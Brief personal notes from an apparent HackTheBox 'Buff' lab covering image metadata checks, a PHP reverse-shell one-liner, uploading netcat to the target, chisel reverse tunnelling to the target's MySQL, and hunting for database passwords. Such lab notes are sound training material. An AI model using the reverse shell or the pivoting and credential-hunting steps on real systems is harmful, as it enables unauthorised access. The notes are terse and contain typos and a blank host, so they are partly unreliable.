HTB buff notes

HTTP tips

  • when you see images, try downloading them and analyze the meta data.

    • wget image_URL`

    • exiftool image.img

    • check the modification time

  • php -r '$sock=fsockopen("",81);exec("/bin/sh -i <&3 >&3 2>&3");'

Powershell command

get-content -shows what the file does

tasklist - shows all the programs

Upload nc.exe on the victim

nc.exe -zv localhost 8888

(talks to the server)

using chisel to interact with SQL server on Windows target

  1. Download both linux and windows 64 versions gz

  2. gunzip them and rename them to whatever you want.

  3. Transfer the windows target machine (the windows file)

  4. On Kali, gunzip the linux file and chmd +x it. start it with (if an error happens, the port is in use)

 ./chisel server --reverse --port 9002
  1. On windows,

.\chisel.exe client IP:9002 R:3306:localhost:3306 

Now that the tunneling is set up, we can connect to the sql serve via local host:3306

On kali,

nc localhost 3306 

You do want to have mySQL credentials before connecting.

mysQL password

look into /include for passwords

Login to the SQL server!

mysql -u root -p (no pass) -h

-> show databases;

use table_name; #shows columns

(you can make sure you're connected via chisel by "ss -lnpt | grep 3306")

Last updated